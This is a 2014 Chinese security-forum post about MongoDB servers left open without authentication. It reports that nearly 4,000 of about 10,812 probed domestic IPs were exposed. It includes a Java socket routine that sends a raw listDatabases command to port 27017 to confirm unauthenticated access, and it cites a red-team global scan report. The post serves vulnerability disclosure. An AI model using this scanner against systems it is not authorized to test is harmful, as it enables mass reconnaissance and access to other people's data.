Mongodb未授权访问 (WOOYUN)

  • A+
所属分类:WooYun-Zone

园长 (喵~) Mongodb未授权访问  (WOOYUN) | 2014-12-21 23:09

Mongodb默认不需要配置auth导致未授权访问问题令人堪忧。
前年的时候写了个Mongodb未授权扫描工具发现了一些企业Mongodb未授权访问问题(测试发现包括一些游戏厂商),但在数量上还不太严重。
近期Mongodb问题越演越烈,上周对10812个国内IP进行探测时候发现了接近4000个未授权访问IP。
Mongodb未授权访问  (WOOYUN)

漏洞验证方法:
利用mongo-java-driver-2.12.4.jar
MongoClient client = new MongoClient(host,port);
或:
private boolean loginTest(String host,int timeout){
    try {
      byte[] b = new byte[]{0x3f,0x00,0x00,0x00,(byte) 0x97,0x75,(byte) 0xbc,0x60,(byte) 0xff,(byte) 0xff,(byte) 0xff,(byte) 0xff,(byte) 0xd4,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x61,0x64,0x6d,0x69,0x6e,0x2e,0x24,0x63,0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x00,0x00,0x00,0x10,0x6c,0x69,0x73,0x74,0x44,0x61,0x74,0x61,0x62,0x61,0x73,0x65,0x73,0x00,0x01,0x00,0x00,0x00,0x00};
      InetSocketAddress address = new InetSocketAddress(host,27017);
      Socket socket = new Socket();
      socket.connect(address,timeout);
      socket.setSoTimeout(timeout);
      OutputStream out = socket.getOutputStream();
      out.write(b);
      socket.shutdownOutput();
      BufferedReader br = new BufferedReader(new InputStreamReader(socket.getInputStream()));
      String str = "";
      StringBuilder sb = new StringBuilder();
      while((str=br.readLine())!=null){
        sb.append(str);
      }
      return sb.toString().contains("local");
    } catch (Exception e) {
      return false;
    }
  }

这里似乎有一份邪红色团队的“全球Mongodb未授权访问探测报告"同样说明了问题的严重性:
Mongodb unauthorized access vulnerability global probing report
[+] Author: f1,2,4
[+] Team: FF0000 TEAM <http://www.ff0000.cc>
[+] From: HackerSoul <http://www.hackersoul.com>
[+] Create: 2014-12-10
Introduction
Domain list
Proof of Concept
Scan results
IP location
Evil hackers

分享到: